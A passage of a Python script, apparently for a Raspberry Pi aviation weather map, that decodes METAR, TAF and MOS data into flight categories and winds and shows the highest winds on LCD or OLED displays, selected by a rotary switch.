hour_dict = collections.OrderedDict() #clear out hour_dict for next airport
else:
#continue to decode the next category data that was read.
last_cat = cat #store what the last read cat was.
temp = (re.findall(r'\s?(\s*\S+)', value.rstrip()))
set_data()
hour_dict = collections.OrderedDict() #clear out hour_dict for next airport
#Now grab the data needed to display on map. Key: [airport][hr][j] - using nested dictionaries
# airport = from airport file, 4 character ID. hr = 1 of 8 three-hour periods of time, 00 03 06 09 12 15 18 21
# j = index to weather categories, in this order; 'CLD','WDR','WSP','P06', 'T06', 'POZ', 'POS', 'TYP','CIG','VIS','OBV'.
# See; https://www.weather.gov/mdl/mos_gfsmos_mavcard for description of available data.
for airport in airports:
if airport in mos_dict:
logger.debug('\n' + airport)
logger.debug(categories)
mos_time = int(current_hr_zulu) + hour_to_display
if mos_time >= 24: #check for reset at 00z
mos_time = mos_time - 24
logger.debug(keys)
for hr in keys:
logger.debug(hr + ", " + str(mos_time) + ", " + str(int(hr)+2.99))
if int(hr) <= mos_time <= int(hr)+2.99:
cld = (mos_dict[airport][hr][0])
wdr = (mos_dict[airport][hr][1]) +'0' #make wind direction end in zero
wsp = (mos_dict[airport][hr][2])
p06 = (mos_dict[airport][hr][3])
t06 = (mos_dict[airport][hr][4])
poz = (mos_dict[airport][hr][5])
pos = (mos_dict[airport][hr][6])
typ = (mos_dict[airport][hr][7])
cig = (mos_dict[airport][hr][8])
vis = (mos_dict[airport][hr][9])
obv = (mos_dict[airport][hr][10])
logger.debug(hr+", "+cld+", "+wdr+", "+wsp+", "+p06+", "+t06+", "+poz+", "+pos+", "+typ+", "+cig+", "+vis+", "+obv) #debug
#decode the weather for each airport to display on the livesectional map
flightcategory = "VFR" #start with VFR as the assumption
if cld in ("OV","BK"): #If the layer is OVC, BKN, set Flight category based on height of layer
if cig <= '2': #AGL is less than 500:
flightcategory = "LIFR"
elif cig == '3': #AGL is between 500 and 1000
flightcategory = "IFR"
elif '4' <= cig <= '5': #AGL is between 1000 and 3000:
flightcategory = "MVFR"
elif cig >= '6': #AGL is above 3000
flightcategory = "VFR"
#Check visability too.
if flightcategory != "LIFR": #if it's LIFR due to cloud layer, no reason to check any other things$
if vis <= '2': #vis < 1.0 mile:
flightcategory = "LIFR"
elif '3' <= vis < '4': #1.0 <= vis < 3.0 miles:
flightcategory = "IFR"
elif vis == '5' and flightcategory != "IFR": #3.0 <= vis <= 5.0 miles
flightcategory = "MVFR"
logger.debug(flightcategory + " |"),
logger.debug('Windspeed = ' + wsp + ' | Wind dir = ' + wdr + ' |'),
#decode reported weather using probabilities provided.
if typ == '9': #check to see if rain, freezing rain or snow is reported. If not use obv weather
wx = obv_wx[obv] #Get proper representation for obv designator
else:
wx = typ_wx[typ] #Get proper representation for typ designator
if wx == 'RA' and int(p06) < prob:
if obv != 'N':
wx = obv_wx[obv]
else:
wx = 'NONE'
if wx == 'SN' and int(pos) < prob:
wx = 'NONE'
if wx == 'FZRA' and int(poz) < prob:
wx = 'NONE'
if t06 == '' or t06 is None:
t06 = '0'
if int(t06) > prob: #check for thunderstorms
wx = 'TSRA'
else:
wx = 'NONE'
logger.debug('Reported Weather = ' + wx)
#Connect the information from MOS to the board
stationId = airport
#grab wind speeds from returned MOS data
if wsp is None: #if wind speed is blank, then bypass
windspeedkt = 0
elif wsp == '99': #Check to see if the MOS data didn't report a windspeed for this airport
windspeedkt = 0
else:
windspeedkt = int(wsp)
#grab wind direction from returned FAA data
if wdr is None: #if wind direction is blank, then bypass
winddirdegree = 0
else:
winddirdegree = int(wdr)
#grab Weather info from returned FAA data
if wx is None: #if weather string is blank, then bypass
wxstring = "NONE"
else:
wxstring = wx
logger.debug(stationId+ ", " + str(windspeedkt) + ", " + wxstring)
#Check for duplicate airport identifier and skip if found, otherwise store in dictionary. covers for dups in "airports" file
if stationId in stationiddict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
stationiddict[stationId] = flightcategory #build category dictionary
if stationId in windsdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
windsdict[stationId] = windspeedkt #build windspeed dictionary
if stationId in wnddirdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
wnddirdict[stationId] = winddirdegree #build wind direction dictionary
if stationId in wxstringdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
wxstringdict[stationId] = wxstring #build weather dictionary
logger.info("Decoded MOS Data for Display")
#TAF decode routine. This routine will decode the TAF, pick the appropriate time frame to display.
if metar_taf_mos == 0: #0 equals display TAF.
#start of TAF decoding routine
for data in root.iter('data'):
num_results = data.attrib['num_results'] #get number of airports reporting TAFs to be used for diagnosis only
logger.debug("\nNum of Airport TAFs = " + num_results)
for taf in root.iter('TAF'): #iterate through each airport's TAF
stationId = taf.find('station_id').text
logger.debug(stationId)
logger.debug('Current+Offset Zulu - ' + current_zulu)
taf_wx_string = ""
taf_change_indicator = ""
taf_wind_dir_degrees = ""
taf_wind_speed_kt = ""
taf_wind_gust_kt = ""
for forecast in taf.findall('forecast'): #Now look at the forecasts for the airport
# Routine inspired by Nick Cirincione.
flightcategory = "VFR" #intialize flight category
taf_time_from = forecast.find('fcst_time_from').text #get taf's from time
taf_time_to = forecast.find('fcst_time_to').text #get taf's to time
if forecast.find('wx_string') is not None:
taf_wx_string = forecast.find('wx_string').text #get weather conditions
if forecast.find('change_indicator') is not None:
taf_change_indicator = forecast.find('change_indicator').text #get change indicator
if forecast.find('wind_dir_degrees') is not None:
taf_wind_dir_degrees = forecast.find('wind_dir_degrees').text #get wind direction
if forecast.find('wind_speed_kt') is not None:
taf_wind_speed_kt = forecast.find('wind_speed_kt').text #get wind speed
if forecast.find('wind_gust_kt') is not None:
taf_wind_gust_kt = forecast.find('wind_gust_kt').text #get wind gust speed
if taf_time_from <= current_zulu <= taf_time_to: #test if current time plus offset falls within taf's timeframe
logger.debug('TAF FROM - ' + taf_time_from)
logger.debug(comp_time(taf_time_from))
logger.debug('TAF TO - ' + taf_time_to)
logger.debug(comp_time(taf_time_to))
#There can be multiple layers of clouds in each taf, but they are always listed lowest AGL first.
#Check the lowest (first) layer and see if it's overcast, broken, or obscured. If it is, then compare to cloud base height to set the flight category.
#This algorithm basically sets the flight category based on the lowest OVC, BKN or OVX layer.
for sky_condition in forecast.findall('sky_condition'): #for each sky_condition from the XML
sky_cvr = sky_condition.attrib['sky_cover'] #get the sky cover (BKN, OVC, SCT, etc)
logger.debug(sky_cvr)
if sky_cvr in ("OVC","BKN","OVX"): #If the layer is OVC, BKN or OVX, set Flight category based on height AGL
try:
cld_base_ft_agl = sky_condition.attrib['cloud_base_ft_agl'] #get cloud base AGL from XML
logger.debug(cld_base_ft_agl) #debug
except KeyError: #no cloud_base_ft_agl attribute; fall back to vertical visibility
cld_base_ft_agl = forecast.find('vert_vis_ft').text #get cloud base AGL from XML
# cld_base_ft_agl = sky_condition.attrib['cloud_base_ft_agl'] #get cloud base AGL from XML
# logger.debug(cld_base_ft_agl)
cld_base_ft_agl = int(cld_base_ft_agl)
if cld_base_ft_agl < 500:
flightcategory = "LIFR"
break
elif 500 <= cld_base_ft_agl < 1000:
flightcategory = "IFR"
break
elif 1000 <= cld_base_ft_agl <= 3000:
flightcategory = "MVFR"
break
elif cld_base_ft_agl > 3000:
flightcategory = "VFR"
break
#visibility can also set flight category. If the clouds haven't set the fltcat to LIFR already, see if visibility will.
if flightcategory != "LIFR": #if it's LIFR due to cloud layer, no reason to check anything else that could lower the flight category
if forecast.find('visibility_statute_mi') is not None: #check XML if visibility value exists
visibility_statute_mi = forecast.find('visibility_statute_mi').text #get visibility number
visibility_statute_mi = float(visibility_statute_mi)
logger.debug(visibility_statute_mi)
if visibility_statute_mi < 1.0:
flightcategory = "LIFR"
elif 1.0 <= visibility_statute_mi < 3.0:
flightcategory = "IFR"
elif 3.0 <= visibility_statute_mi <= 5.0 and flightcategory != "IFR": #don't downgrade if Flight Category was already IFR
flightcategory = "MVFR"
#Print out TAF data to screen for debugging only
logger.debug('Airport - ' + stationId)
logger.debug('Flight Category - ' + flightcategory)
logger.debug('Wind Speed - ' + taf_wind_speed_kt)
logger.debug('WX String - ' + taf_wx_string)
logger.debug('Change Indicator - ' + taf_change_indicator)
logger.debug('Wind Direction Degrees - ' + taf_wind_dir_degrees)
logger.debug('Wind Gust - ' + taf_wind_gust_kt)
#grab flight category from returned FAA data
if flightcategory is None: #if flight category is blank, then bypass
flightcategory = "NONE"
#grab wind speeds from returned FAA data
if taf_wind_speed_kt is None: #if wind speed is blank, then bypass
windspeedkt = 0
else:
windspeedkt = int(taf_wind_speed_kt)
#grab wind gust from returned FAA data - Lance Blank
if taf_wind_gust_kt is None or taf_wind_gust_kt == '': #if wind speed is blank, then bypass
windgustkt = 0
else:
windgustkt = int(taf_wind_gust_kt)
#grab wind direction from returned FAA data
if taf_wind_dir_degrees is None: #if wind direction is blank, then bypass
winddirdegree = 0
else:
winddirdegree = int(taf_wind_dir_degrees)
#grab Weather info from returned FAA data
if taf_wx_string is None: #if weather string is blank, then bypass
wxstring = "NONE"
else:
wxstring = taf_wx_string
#Check for duplicate airport identifier and skip if found, otherwise store in dictionary. covers for dups in "airports" file
if stationId in stationiddict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
stationiddict[stationId] = flightcategory #build category dictionary
if stationId in windsdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
windsdict[stationId] = windspeedkt #build windspeed dictionary
if stationId in wnddirdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
wnddirdict[stationId] = winddirdegree #build wind direction dictionary
if stationId in wxstringdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
wxstringdict[stationId] = wxstring #build weather dictionary
if stationId in wndgustdict: #Lance Blank
logger.info(stationId + "Duplicate, only saved the first winds")
else:
wndgustdict[stationId] = windgustkt #build windgust dictionary
logger.info("Decoded TAF Data for Display")
elif metar_taf_mos == 1: #Decode METARs to display
#grab the airport category, wind speed and various weather from the results given from FAA.
#start of METAR decode routine if 'metar_taf' equals 1. Script will default to this routine without a rotary switch installed.
for metar in root.iter('METAR'):
stationId = metar.find('station_id').text
#grab flight category from returned FAA data
if metar.find('flight_category') is None: #if category is blank, then bypass
flightcategory = "NONE"
else:
flightcategory = metar.find('flight_category').text
#grab wind speeds from returned FAA data
if metar.find('wind_speed_kt') is None: #if wind speed is blank, then bypass
windspeedkt = 0
else:
windspeedkt = int(metar.find('wind_speed_kt').text)
#grab wind gust from returned FAA data - Lance Blank
if metar.find('wind_gust_kt') is None: #if wind speed is blank, then bypass
windgustkt = 0
else:
windgustkt = int(metar.find('wind_gust_kt').text)
#grab wind direction from returned FAA data
if metar.find('wind_dir_degrees') is None: #if wind speed is blank, then bypass
winddirdegree = 0
else:
winddirdegree = int(metar.find('wind_dir_degrees').text)
#grab Weather info from returned FAA data
if metar.find('wx_string') is None: #if weather string is blank, then bypass
wxstring = "NONE"
else:
wxstring = metar.find('wx_string').text
#Check for duplicate airport identifier and skip if found, otherwise store in dictionary. covers for dups in "airports" file
if stationId in stationiddict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
stationiddict[stationId] = flightcategory #build category dictionary
if stationId in windsdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
windsdict[stationId] = windspeedkt #build windspeed dictionary
if stationId in wnddirdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
wnddirdict[stationId] = winddirdegree #build wind direction dictionary
if stationId in wxstringdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
wxstringdict[stationId] = wxstring #build weather dictionary
if stationId in wndgustdict: #Lance - Thanks
print ("Duplicate, only saved the first winds")
else:
wndgustdict[stationId] = windgustkt #build windgust dictionary
logger.info("Decoded METAR Data for Display")
#Grab the top X number of high winds and put them in a sorted list from highest to lowest to display
if exclusive_flag == 1:
num2display = config.LED_COUNT #Reset num2display to all the airports if we are using exclusive_list
newwindsdict = dict(sorted(iter(windsdict.items()), key=operator.itemgetter(1), reverse=True)[:num2display])
sortwindslist = sorted(list(newwindsdict.items()), key=operator.itemgetter(1))
sortwindslist.reverse()
if sortwindslist == []:
sortwindslist = [(' ',0)] #Used when Heat Map is selected
if exclusive_flag == 1: #check if we should include an exclusive subset of airports to display
logger.debug(sortwindslist)
tmp1 = sorted(i for i in sortwindslist if i[0] in exclusive_list)
tmp1.sort(key=lambda tup: tup[1]) #sort by wind value
tmp1.reverse() #Reverse so list is sorted highest to lowest
if len(tmp1) < numofdisplays: #Pad blanks if airports are less than numofdisplays
blank = [('', '')] * (numofdisplays - len(tmp1))
tmp1 = tmp1 + blank
sortwindslist = tmp1 #Reset sortwindslist to only those whose winds are higher than specified
hiap, hiwind = sortwindslist[0] #Get the highest wind speed airport identifier and its wind speed.
if abovekts == 1: #check if we should only display airports whose winds are higher or equal to value in minwinds
logger.debug(sortwindslist)
tmp1 = sorted(i for i in sortwindslist if i[1] != '') #filter out blank screens that would throw an error when compared to minwinds
logger.debug(tmp1)
tmp1 = sorted(i for i in tmp1 if i[1] >= minwinds) #keep only airports with winds at or above minwinds
tmp1.sort(key=lambda tup: tup[1]) #sort by wind value
tmp1.reverse() #Reverse so list is sorted highest to lowest
if len(tmp1) <= 0: #If there are no airports with winds higher than set add comment to string
if lcddisplay: #different comments depending on display used
tmp1 = [("All Airports"," Lower Than " + str(minwinds))]
else:
tmp1 = [("Winds","Calm")]
if len(tmp1) < numofdisplays: #Pad blanks if airports are less than numofdisplays
blank = [('','')] * (numofdisplays - len(tmp1))
tmp1 = tmp1 + blank
sortwindslist = tmp1 #Reset sortwindslist to only those whose winds are higher than specified
if blankscr: #Add a blank screen to separate the group of airports displayed
sortwindslist.append(tuple(('','')))
#Force the list to be at least as long as the number of displays.
if len(sortwindslist) < numofdisplays: #Pad blanks if airports are less than numofdisplays
blank = [('','')] * (numofdisplays - len(sortwindslist))
sortwindslist = sortwindslist + blank
logger.debug(len(sortwindslist))
logger.debug(sortwindslist)
logger.info("Built Wind Dictionary")
#See http://www.circuitbasics.com/raspberry-pi-lcd-set-up-and-programming-in-python/
#Find the top windspeeds and airports and display to LCD if used. Written for a 16x2 display wired in 4 bit format.
if lcddisplay:
logger.info("LCD Display Being Used")
#Bit maps for 8 special characters, Arrows, to display wind direction along with wind speed.
#See https://rplcd.readthedocs.io/en/stable/usage.html#creating-custom-characters for more info on creating characters.
swarrow = (
0b00000,
0b01111,
0b00011,
0b00101,
0b01001,
0b10000,
0b00000,
0b00000
)
nwarrow = (
0b00000,
0b00000,
0b10000,
0b01001,
0b00101,
0b00011,
0b01111,
0b00000
)
nearrow = (
0b00000,
0b00000,
0b00001,
0b10010,
0b10100,
0b11000,
0b11110,
0b00000
)
searrow = (
0b00000,
0b11110,
0b11000,
0b10100,
0b10010,
0b00001,
0b00000,
0b00000
)
northarrow = (
0b00000,
0b00100,
0b00100,
0b00100,
0b10101,
0b01110,
0b00100,
0b00000
)
eastarrow = (
0b00000,
0b00000,
0b00100,
0b01000,
0b11111,
0b01000,
0b00100,
0b00000
)
southarrow = (
0b00000,
0b00100,
0b01110,
0b10101,
0b00100,
0b00100,
0b00100,
0b00000
)
westarrow = (
0b00000,
0b00000,
0b00100,
0b00010,
0b11111,
0b00010,
0b00100,
0b00000
)
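#Each tuple above defines one 5x8-pixel custom character, one 0bxxxxx row per
#line, top to bottom. In 'northarrow', for example, the 0b00100 rows form the
#shaft and 0b10101/0b01110/0b00100 converge into a downward-pointing head -
#wind *from* the north points down, matching the winddir() convention above.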
long_string = "Winds Updated " + dt_string + "--"
#Build the instance of LCD. Be sure to include "compat_mode = True" to eliminate extraneous characters on the display.
lcd = CharLCD(numbering_mode=GPIO.BCM, cols=16, rows=2, pin_rs=26, pin_e=19, pins_data=[13, 6, 5, 11], compat_mode = True)
lcd.clear()
lcd.cursor_mode = 'hide'
#Create special Characters using bitmaps above. See https://rplcd.readthedocs.io/en/stable/usage.html#creating-custom-characters
lcd.create_char(0,swarrow)
lcd.create_char(1,nwarrow)
lcd.create_char(2,nearrow)
lcd.create_char(3,searrow)
lcd.create_char(4,northarrow)
lcd.create_char(5,eastarrow)
lcd.create_char(6,southarrow)
lcd.create_char(7,westarrow)
for ap,wnd in sortwindslist: #airport and winds
dir = wnddirdict.get(ap) #get wind direction by airport
arrowdir = winddir(dir) #get the proper arrow to display
#Determine wind direction and assign proper arrow direction
if arrowdir == 'd': #From North
arrow = '\x04'
elif arrowdir == 'f': #From North East
arrow = '\x02'
elif arrowdir == 'b': #From East
arrow = '\x05'
elif arrowdir == 'e': #From South East
arrow = '\x03'
elif arrowdir == 'c': #From South
arrow = '\x06'
elif arrowdir == 'g': #From South West
arrow = '\x00'
elif arrowdir == 'a': #From West
arrow = '\x07'
elif arrowdir == 'h': #From North West
arrow = '\x01'
else:
arrow = '' #No arrow returned
if ap != '': #check to see if there is an airport to display
long_string = long_string + ap + ":" + str(wnd) + "kts " + arrow + " "
logger.debug(long_string)
if abovekts: #check to see if we should only display airports whose winds are higher than 'minwinds'
framebuffer = [str(minwinds) + ' kts or Above','']
else:
framebuffer = [str(num2display) + ' Highest Winds','']
#OLED Display
if oledused:
logger.info("OLED Displays Used")
#Reference material; https://pillow.readthedocs.io/en/stable/reference
#Initialize library.
for j in range(numofdisplays):
tca_select(j) #select display to write to
disp.begin()
disp.display()
#Create blank image for drawing.
width = disp.width
height = disp.height
image = Image.new('1', (width, height)) #Make sure to create image with mode '1' for 1-bit color.
#Get drawing object to draw on image.
draw = ImageDraw.Draw(image)
#Load fonts. Install font package --> sudo apt-get install ttf-mscorefonts-installer
#Also see; https://stackoverflow.com/questions/1970807/center-middle-align-text-with-pil for info
#Arrows.ttf downloaded from https://www.1001fonts.com/arrows-font.html#styles
boldfont = ImageFont.truetype('/usr/share/fonts/truetype/liberation/LiberationSerif-Bold.ttf', fontsize, fontindex)
regfont = ImageFont.truetype('/usr/share/fonts/truetype/liberation/LiberationSerif-Regular.ttf', fontsize, fontindex)
arrows = ImageFont.truetype('/usr/share/fonts/truetype/misc/Arrows.ttf', fontsize, fontindex)
logger.info("Fonts Loaded")
font = regfont #initialize font to start
temp = 0 #Used to toggle invert if set
toggle = 0 #Used to toggle invert between groups of airports. Leave set at 0
#Add update message to beginning of list
sortwindslist.insert(0,("Updated", dt_string))
#Add type of data being displayed, METAR, TAF, MOS etc
if metar_taf_mos == 1: #Displaying METAR data
sortwindslist.insert(0,("METARs", "Displayed"))
elif metar_taf_mos == 0: #TAF hour_to_display
#Lookup table replaces the original 13-branch if chain; position 12 means no rotary switch installed and reuses position 0's offset.
taf_times = [time_sw0, time_sw1, time_sw2, time_sw3, time_sw4, time_sw5, time_sw6, time_sw7, time_sw8, time_sw9, time_sw10, time_sw11, time_sw0]
if 0 <= toggle_sw < len(taf_times):
sortwindslist.insert(0,(str(taf_times[toggle_sw]) + " hr TAF", "Displayed"))
elif metar_taf_mos == 2: #MOS hour_to_display
mos_times = [time_sw0, time_sw1, time_sw2, time_sw3, time_sw4, time_sw5, time_sw6, time_sw7, time_sw8, time_sw9, time_sw10, time_sw11, time_sw0]
if 0 <= toggle_sw < len(mos_times):
sortwindslist.insert(0,(str(mos_times[toggle_sw]) + " hr MOS", "Displayed"))
#Display welcome message via OLED displays if 'usewelcome = 1'
if usewelcome and toggle_sw != -1: #if toggle_sw == -1 then this script just started. Suppress welcome message for now
logger.info("Use Welcome Enabled")
if oledposorder == 0:
startnum = 0 #values are for oleds wired normally, pos 0 thru 7
stopnum = numofdisplays
stepnum = 1
else:
startnum = numofdisplays-1 #these values are for oleds wired backwards, pos 7 thru 0
stopnum = -1
stepnum = -1
font = boldfont
arrowdir = '' #No arrow needed
j = 0
welcomelist = list(welcome.split(" ")) #create a list to use to display a welcome message if desired
if displayIP: #will display the RPI's local IP address along with welcome message if desired.
splitIP = re.sub(r'^(.*?(\..*?){1})\.', r'\1\n.', str(s.getsockname()[0])) #split IP into 2 lines
logger.debug(splitIP)
welcomelist = welcomelist + [splitIP] #split into 2 lines
# welcomelist = welcomelist + [str(s.getsockname()[0])] #all on one line
if len(welcomelist) < numofdisplays:
pad = int((numofdisplays - len(welcomelist))/2)
welcomelist = ([''] * pad) + welcomelist
blanks = [''] * numofdisplays #add blanks to end of message to clean display after message
welcomelist = welcomelist + blanks
if GPIO.input(4) == 1: #Set dimming level
dimming = 1 #1 = full dim
else:
dimming = dimswitch #Brightness setting. dimswitch can be 0, 1 or 2; 1 is most dim, 2 medium dim.
logger.debug(welcomelist)
while j < len(welcomelist):
for ch in range(startnum, stopnum, stepnum):
if j < len(welcomelist):
word = welcomelist[j]
else:
word = ''
oledcenter(word, ch, font, arrowdir, dimming, toggle, 0)
if numofdisplays == 1:
time.sleep(oledpause)
else:
time.sleep(oledpause/4)
j += 1
#Loop through the airports and display the winds until it's time to update the weather from the FAA
#Setup timed loop for updating FAA Weather that will run based on the value of update_interval which is a user setting
k = 0 #counter for displaying local time, if desired.
if toggle_sw != -1: #check to see if this is the first time through and bypass if it is.
if oledused:
clearoleddisplays()
if lcddisplay:
lcd.clear()
timeout_start = time.time() #When timer hits user-defined value, go back to outer loop to update FAA Weather.
while time.time() < timeout_start + (update_interval * 60): #take "update_interval" which is in minutes and turn into seconds
#If the rotary switch is in Heat Map Mode, display such on the displays.
if metar_taf_mos == 3:
if lcddisplay:
lcd.clear()
lcd.cursor_mode = 'hide'
loop_string("Heat Map Mode", lcd, framebuffer, 1, 16, lcdpause)
if oledused: #Display top AP Landings list on oleds
arrowdir = ''
dimming = 0
toggle = 0
j = 0
ch = 0
logger.debug(hmdata_sorted)
while j < 10:
for ch in range(startnum, stopnum, stepnum): #numofdisplays-1, -1, -1):
if j == 0:
val = hmdata_sorted[j]
elif j >= len(hmdata_sorted): #past the end of the list; blank any remaining displays to avoid an IndexError
val = ''
else:
hmap, numland = hmdata_sorted[j]
val = hmap + "\n" + '#' + str(j)
oledcenter(val, ch, font, arrowdir, dimming, toggle, 0) #send airport and winds to proper oled display
j += 1
if numofdisplays == 1:
time.sleep(oledpause)
else:
time.sleep(oledpause/4)
#Routine to restart this script if config.py is changed while this script is running.
for f, mtime in WATCHED_FILES_MTIMES:
if getmtime(f) != mtime:
logger.info("Restarting from awake" + __file__ + " in 2 sec...")
time.sleep(2)
os.execv(sys.executable, [sys.executable] + [__file__]) #'/NeoSectional/metar-display-v4.py'
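#os.execv replaces the running interpreter image in place, so the script comes
#back up with freshly-imported config values; sys.executable is the current
#Python binary (e.g. '/usr/bin/python3', illustrative) and __file__ this script.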
#Timer routine, used to turn off LED's at night if desired. Use 24 hour time in settings.
if usetimer: #check to see if the user wants to use a timer.
if time_in_range(timeoff, end_time, datetime.now().time()): #Part of Timer Fix - Thank You to Matthew G
# If temporary lights-on period from refresh button has expired, restore the original light schedule
#Part of Timer Fix
if temp_lights_on == 1:
end_time = lights_on
timeoff = lights_out
temp_lights_on = 0
logger.info("Display Going to Sleep")
if lcddisplay:
lcd.clear()
if oledused:
tmp1 = border
border = 0
clearoleddisplays() #clear displays with no borders
border = tmp1
while time_in_range(timeoff, end_time, datetime.now().time()): #Part of timer fix
# sys.stdout.write ("z")
# sys.stdout.flush ()
if sleepmsg == 1: #Display "Sleeping" message on first oled if desired. 0 = No, 1 = Yes
rch = random.randint(0,numofdisplays-1)
oledcenter("Sleeping", rch, font, "", 1, toggle) #send airport and winds to proper oled display
time.sleep(2)
clearoleddisplays()
temp_timeoff = timeoff #store original timeoff time and restore later.
time.sleep(1)
if GPIO.input(22) == False: #Pushbutton for Refresh. Check to see if we should turn on temporarily during sleep mode
# Set to turn lights on two seconds ago to make sure we hit the loop next time through - Part of Timer Fix
end_time = (datetime.now()-timedelta(seconds=2)).time()
timeoff = (datetime.now()+timedelta(minutes=tempsleepon)).time()
temp_lights_on = 1 #Set this to 1 if button is pressed
logger.info("Sleep interrupted by button push")
#Routine to restart this script if config.py is changed while this script is running.
for f, mtime in WATCHED_FILES_MTIMES:
if getmtime(f) != mtime:
logger.info("Restarting from sleep " + __file__ + " in 2 sec...")
time.sleep(2)
os.execv(sys.executable, [sys.executable] + [__file__]) #'/NeoSectional/metar-display-v4.py'
# print ("\033[0;0m\n") #Turn off Purple text.
#Check if rotary switch is used, and what position it is in. This will determine what to display, METAR or TAF data.
#If TAF data, what time offset should be displayed, i.e. 0 hour, 1 hour, 2 hour etc.
#If there is no rotary switch installed, then all these tests will fail and will display the defaulted data from Switch Position 0
if GPIO.input(0) == False and toggle_sw != 0:
toggle_sw = 0
hour_to_display = time_sw0 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw0 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 0. Breaking out of loop for METARs')
break
elif GPIO.input(5) == False and toggle_sw != 1:
toggle_sw = 1
hour_to_display = time_sw1 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw1 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 1. Breaking out of loop for TAF/MOS + ' + str(time_sw1) + " hour")
break
elif GPIO.input(6) == False and toggle_sw != 2:
toggle_sw = 2
hour_to_display = time_sw2 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw2 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 2. Breaking out of loop for TAF/MOS + ' + str(time_sw2) + " hours")
break
elif GPIO.input(13) == False and toggle_sw != 3:
toggle_sw = 3
hour_to_display = time_sw3 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw3 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 3. Breaking out of loop for TAF/MOS + ' + str(time_sw3) + " hours")
break
elif GPIO.input(19) == False and toggle_sw != 4:
toggle_sw = 4
hour_to_display = time_sw4 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw4 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 4. Breaking out of loop for TAF/MOS + ' + str(time_sw4) + " hours")
break
elif GPIO.input(26) == False and toggle_sw != 5:
toggle_sw = 5
hour_to_display = time_sw5 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw5 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 5. Breaking out of loop for TAF/MOS + ' + str(time_sw5) + " hours")
break
elif GPIO.input(21) == False and toggle_sw != 6:
toggle_sw = 6
hour_to_display = time_sw6 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw6 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 6. Breaking out of loop for TAF/MOS + ' + str(time_sw6) + " hours")
break
elif GPIO.input(20) == False and toggle_sw != 7:
toggle_sw = 7
hour_to_display = time_sw7 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw7 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 7. Breaking out of loop for TAF/MOS + ' + str(time_sw7) + " hours")
break
elif GPIO.input(16) == False and toggle_sw != 8:
toggle_sw = 8
hour_to_display = time_sw8 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw8 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 8. Breaking out of loop for TAF/MOS + ' + str(time_sw8) + " hours")
break
elif GPIO.input(12) == False and toggle_sw != 9:
toggle_sw = 9
hour_to_display = time_sw9 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw9 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 9. Breaking out of loop for TAF/MOS + ' + str(time_sw9) + " hours")
break
elif GPIO.input(1) == False and toggle_sw != 10:
toggle_sw = 10
hour_to_display = time_sw10 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw10 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 10. Breaking out of loop for TAF/MOS + ' + str(time_sw10) + " hours")
break
elif GPIO.input(7) == False and toggle_sw != 11:
toggle_sw = 11
hour_to_display = time_sw11 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw11 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 11. Breaking out of loop for TAF/MOS + ' + str(time_sw11) + " hours")
break
elif toggle_sw == -1: #Used if no Rotary Switch is installed
toggle_sw = 12 #12 designates that no Rotary Switch is installed
hour_to_display = time_sw0 #Value set above in default position 0
metar_taf_mos = data_sw0 #Value set above in default position 0
logger.info('Rotary Switch Not Installed. Using Switch Position 0 as Default')
break
#Check to see if pushbutton is pressed to force an update of FAA Weather
#If no button is connected, then this is bypassed and will only update when 'update_interval' is met
if GPIO.input(22) == False:
logger.info('Breaking out of loop to refresh FAA Data')
break
#Bright light will provide a low state (0) on GPIO. Dark light will provide a high state (1).
#Full brightness will be used if no light sensor is installed. IC238 Light Sensor.
if GPIO.input(4) == 1:
dimming = 1 #1 = full dim
else:
dimming = dimswitch #Brightness setting. dimswitch can be 0, 1 or 2; 1 is most dim, 2 medium dim.
if lcddisplay:
print ("Display on a LCD display")
#Below creates a scrolling effect of the X highest winds, updated every 15 minutes (update_interval)
lcd.clear()
lcd.cursor_mode = 'hide'
